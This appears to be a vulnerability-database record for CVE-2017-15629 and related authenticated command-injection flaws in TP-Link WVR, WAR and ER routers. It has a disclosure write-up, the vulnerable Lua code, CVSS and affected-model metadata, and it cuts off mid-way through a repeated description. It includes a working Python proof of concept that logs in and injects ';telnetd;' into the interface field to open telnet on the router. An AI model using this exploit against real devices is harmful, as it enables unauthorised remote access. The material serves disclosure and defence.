var-201801-0554
Vulnerability from variot
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-tunnelname variable in the pptp_client.lua file. TP-Link WVR , WAR ,and ER The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices. These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled).
Vulnerability Type:
Command Injection (Authenticated)
Product:
We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306). And the following model should also be affected and the vendor has confirmed: TP-Link ER5110G, TP-Link ER5120G, TP-Link ER5510G, TP-Link ER5520G, TP-Link R4149G, TP-Link R4239G, TP-Link R4299G, TP-Link R473GP-AC, TP-Link R473G, TP-Link R473P-AC, TP-Link R473, TP-Link R478G+, TP-Link R478, TP-Link R478+, TP-Link R483G, TP-Link R483, TP-Link R488, TP-Link WAR1300L, TP-Link WAR1750L, TP-Link WAR2600L, TP-Link WAR302, TP-Link WAR450L, TP-Link WAR450, TP-Link WAR458L, TP-Link WAR458, TP-Link WAR900L, TP-Link WVR1300G, TP-Link WVR1300L, TP-Link WVR1750L, TP-Link WVR2600L, TP-Link WVR300, TP-Link WVR302, TP-Link WVR4300L, TP-Link WVR450L, TP-Link WVR450, TP-Link WVR458L, TP-Link WVR900G, TP-Link WVR900L
CVE details:
The detail of each vulnerability are as follows: CVE-2017-15613: new-interface variable in the cmxddns.lua file CVE-2017-15614: new-outif variable in the pptp_client.lua file CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file CVE-2017-15616: new-interface variable in the phddns.lua file CVE-2017-15617: iface variable in the interface_wan.lua file CVE-2017-15618: new-enable variable in the pptp_client.lua file CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file CVE-2017-15620: new-zone variable in the ipmac_import.lua file CVE-2017-15621: olmode variable in the interface_wan.lua file CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file CVE-2017-15623: new-enable variable in the pptp_server.lua file CVE-2017-15624: new-authtype variable in the pptp_server.lua file CVE-2017-15625: new-olmode variable in the pptp_client.lua file CVE-2017-15626: new-bindif variable in the pptp_server.lua file CVE-2017-15627: new-pns variable in the pptp_client.lua file CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file CVE-2017-15631: new-workmode variable in the pptp_client.lua file CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file CVE-2017-15633: new-ipgroup variable in the session_limits.lua file CVE-2017-15634: name variable in the wportal.lua file CVE-2017-15635: max_conn variable in the session_limits.lua file CVE-2017-15636: new-time variable in the webfilter.lua file CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file
Credits:
chunibalon, puzzor @VARAS of IIE
Timeline:
2017.08 to 2017.09: Issues found. 2017.09.26: Vendor contacted. 2017.10.13: Vendor confirmed. 2017.10.14: CVE id requested. 2017.10.19: CVE id assigned. 2018.1: Vendor confirmed that all effected products have been fixed.
Vulnerability detail:
These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616. Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file.
In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:
function add_phddns(http_form) local form_data = json.decode(http_form.data) local jdata = form_data.params.new
ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)
if not ret then
return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
end
if not uci_r:commit(CONFIG_NAME) then
return false, err.ERR_COM_UCI_COMMIT
end
-- add the ref of interface
ifs.update_if_reference(jdata.interface, 1)
sys.fork_exec('/etc/init.d/phddns restart')
userconfig.cfg_modify()
return jdata
end
This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns". The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently. Then the malformed value of "interface" argument causes the command injection vulnerability.
PoC file:
import requests import urllib import json
This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'
PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406' BASEURL = 'http://192.168.123.1' LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'
MARK = '###' VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)
headers = { "Accept": "application/json, text/javascript, /; q=0.01", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": BASEURL[7:], "Origin": BASEURL, "Referer": "%s/webpages/login.html" % (BASEURL), "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36", "X-Requested-With": "XMLHttpRequest" }
login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}} login_data = {'data':json.dumps(login_data_value)} s = requests.Session() s.headers.update(headers) print (LOGINURL) print (login_data) res = s.post(LOGINURL, data=login_data) stok = eval(res.text)['result']['stok'] print '[*] stok is %s' % (stok)
tmp_vul = VULURL.replace(MARK, stok) print '[*] vul_url is %s ' % (tmp_vul)
delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}} delete_data = {'data': json.dumps(delete_data)} print '[+] delete existed rule' res = s.post(tmp_vul, data=delete_data) print '[*] response is: %s' % (res.text)
after executing this payload, the router will open its telnetd service.
payload = ''';telnetd;''' vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}}
vul_data = {'data': json.dumps(vul_data)} print '[+] sending payload' res = s.post(tmp_vul, data=vul_data) print '[*] response is: %s' % (res.text)
Reference:
https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201801-0554",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wvr900l",
"scope": "eq",
"trust": 1.6,
"vendor": "tp link",
"version": null
},
{
"model": "wvr900g",
"scope": "eq",
"trust": 1.6,
"vendor": "tp link",
"version": "3.0_170306"
},
{
"model": "wvr4300l",
"scope": "eq",
"trust": 1.6,
"vendor": "tp link",
"version": null
},
{
"model": "wvr2600l",
"scope": "eq",
"trust": 1.6,
"vendor": "tp link",
"version": null
},
{
"model": "wvr450l",
"scope": "eq",
"trust": 1.6,
"vendor": "tp link",
"version": "1.0161125"
},
{
"model": "wvr450",
"scope": "eq",
"trust": 1.6,
"vendor": "tp link",
"version": null
},
{
"model": "wvr300",
"scope": "eq",
"trust": 1.6,
"vendor": "tp link",
"version": null
},
{
"model": "wvr458l",
"scope": "eq",
"trust": 1.6,
"vendor": "tp link",
"version": null
},
{
"model": "wvr1750l",
"scope": "eq",
"trust": 1.6,
"vendor": "tp link",
"version": null
},
{
"model": "wvr302",
"scope": "eq",
"trust": 1.6,
"vendor": "tp link",
"version": null
},
{
"model": "r473g",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "r4149g",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "war1300l",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "war450l",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "r4239g",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "r478\\+",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "war458l",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "r478",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "er5120g",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "r473gp-ac",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "war302",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "war2600l",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "r4299g",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "war1750l",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "r488",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "r478g\\+",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "er5110g",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "r473",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "war900l",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "wvr1300g",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "r473p-ac",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "er5520g",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "r483g",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "war458",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "wvr1300l",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "r483",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "war450",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "er5510g",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "tl-er5110g",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-er5120g",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-er5510g",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-er5520g",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r4149g",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r4239g",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r4299g",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r473",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r473g",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r473gp-ac",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r473p-ac",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r478",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r478+",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r478g+",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r483",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r483g",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-r488",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-war1300l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-war1750l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-war2600l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-war302",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-war450",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-war450l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-war458",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-war458l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-war900l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wvr1300g",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wvr1300l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wvr1750l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wvr2600l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wvr300",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wvr302",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wvr4300l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wvr450",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wvr450l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wvr458l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wvr900g",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wvr900l",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "er",
"scope": null,
"trust": 0.6,
"vendor": "tp link",
"version": null
},
{
"model": "wvr",
"scope": null,
"trust": 0.6,
"vendor": "tp link",
"version": null
},
{
"model": "war",
"scope": null,
"trust": 0.6,
"vendor": "tp link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02034"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011946"
},
{
"db": "CNNVD",
"id": "CNNVD-201710-902"
},
{
"db": "NVD",
"id": "CVE-2017-15629"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:tp-link:tl-er5110g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-er5120g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-er5510g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-er5520g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r4149g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r4239g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r4299g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r473_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r473g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r473gp-ac_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r473p-ac_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r478_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r478%2b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r478g%2b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r483_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r483g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-r488_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-war1300l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-war1750l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-war2600l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-war302_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-war450_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-war450l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-war458_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-war458l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-war900l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wvr1300g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wvr1300l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wvr1750l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wvr2600l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wvr300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wvr302_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wvr4300l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wvr450_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wvr450l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wvr458l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wvr900g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wvr900l_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011946"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "chunibalon, puzzor",
"sources": [
{
"db": "PACKETSTORM",
"id": "145823"
}
],
"trust": 0.1
},
"cve": "CVE-2017-15629",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2017-15629",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2018-02034",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-106470",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2017-15629",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-15629",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-15629",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2018-02034",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201710-902",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-106470",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-15629",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02034"
},
{
"db": "VULHUB",
"id": "VHN-106470"
},
{
"db": "VULMON",
"id": "CVE-2017-15629"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011946"
},
{
"db": "CNNVD",
"id": "CNNVD-201710-902"
},
{
"db": "NVD",
"id": "CVE-2017-15629"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-tunnelname variable in the pptp_client.lua file. TP-Link WVR , WAR ,and ER The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices. \nThese vulnerabilities can be triggered in LAN and WAN(if the \"remote management\" function is enabled). \n\n\nVulnerability Type:\n================\nCommand Injection (Authenticated)\n\n\nProduct:\n================\nWe has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306). \nAnd the following model should also be affected and the vendor has confirmed:\nTP-Link ER5110G,\nTP-Link ER5120G,\nTP-Link ER5510G,\nTP-Link ER5520G,\nTP-Link R4149G,\nTP-Link R4239G,\nTP-Link R4299G,\nTP-Link R473GP-AC,\nTP-Link R473G,\nTP-Link R473P-AC,\nTP-Link R473,\nTP-Link R478G+,\nTP-Link R478,\nTP-Link R478+,\nTP-Link R483G,\nTP-Link R483,\nTP-Link R488,\nTP-Link WAR1300L,\nTP-Link WAR1750L,\nTP-Link WAR2600L,\nTP-Link WAR302,\nTP-Link WAR450L,\nTP-Link WAR450,\nTP-Link WAR458L,\nTP-Link WAR458,\nTP-Link WAR900L,\nTP-Link WVR1300G,\nTP-Link WVR1300L,\nTP-Link WVR1750L,\nTP-Link WVR2600L,\nTP-Link WVR300,\nTP-Link WVR302,\nTP-Link WVR4300L,\nTP-Link WVR450L,\nTP-Link WVR450,\nTP-Link WVR458L,\nTP-Link WVR900G,\nTP-Link WVR900L\n\n\nCVE details:\n================\nThe detail of each vulnerability are as follows:\nCVE-2017-15613: new-interface variable in the cmxddns.lua file\nCVE-2017-15614: new-outif variable in the pptp_client.lua file\nCVE-2017-15615: lcpechointerval variable in the pptp_client.lua file\nCVE-2017-15616: new-interface variable in the phddns.lua file\nCVE-2017-15617: iface variable in the interface_wan.lua file\nCVE-2017-15618: new-enable variable in the pptp_client.lua file\nCVE-2017-15619: pptphellointerval variable in the pptp_client.lua file\nCVE-2017-15620: new-zone variable in the ipmac_import.lua file\nCVE-2017-15621: olmode variable in the interface_wan.lua file\nCVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file\nCVE-2017-15623: new-enable variable in the pptp_server.lua file\nCVE-2017-15624: new-authtype variable in the pptp_server.lua file\nCVE-2017-15625: new-olmode variable in the pptp_client.lua file\nCVE-2017-15626: new-bindif variable in the pptp_server.lua file\nCVE-2017-15627: new-pns variable in the pptp_client.lua file\nCVE-2017-15628: lcpechointerval variable in the pptp_server.lua file\nCVE-2017-15629: new-tunnelname variable in the pptp_client.lua file\nCVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file\nCVE-2017-15631: new-workmode variable in the pptp_client.lua file\nCVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file\nCVE-2017-15633: new-ipgroup variable in the session_limits.lua file\nCVE-2017-15634: name variable in the wportal.lua file\nCVE-2017-15635: max_conn variable in the session_limits.lua file\nCVE-2017-15636: new-time variable in the webfilter.lua file\nCVE-2017-15637: pptphellointerval variable in the pptp_server.lua file\n\n\nCredits:\n================\nchunibalon, puzzor @VARAS of IIE\n\n\nTimeline:\n================\n2017.08 to 2017.09: Issues found. \n2017.09.26: Vendor contacted. \n2017.10.13: Vendor confirmed. \n2017.10.14: CVE id requested. \n2017.10.19: CVE id assigned. \n2018.1: Vendor confirmed that all effected products have been fixed. \n\n\nVulnerability detail:\n================\nThese vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616. \nOther vulnerabilities can be reproduced with the detail descriptions of the variable and lua file. \n\nIn /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:\n***********************************\nfunction add_phddns(http_form)\n local form_data = json.decode(http_form.data)\n local jdata = form_data.params.new\n\n ret = form:insert(CONFIG_NAME, \"phddns\", jdata, RULE_KEYS, nil)\n\n if not ret then\n return false, err.ERR_COM_TABLE_ITEM_UCI_ADD\n end\n\n if not uci_r:commit(CONFIG_NAME) then\n return false, err.ERR_COM_UCI_COMMIT\n end\n\n -- add the ref of interface\n ifs.update_if_reference(jdata.interface, 1)\n\n sys.fork_exec(\u0027/etc/init.d/phddns restart\u0027)\n userconfig.cfg_modify()\n\n return jdata\nend\n***********************************\nThis file will process a POST request from the web management panel with url \"ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns\". \nThe interface argument passed by the POST request can be set with the malformed command payload and the lua file didn\u0027t check the argument sufficiently. \nThen the malformed value of \"interface\" argument causes the command injection vulnerability. \n\n\nPoC file:\n================\n***********************************\nimport requests\nimport urllib\nimport json\n\n\n# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616. \n# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be \u0027adminadmin\u0027\n\nPASSWORD = 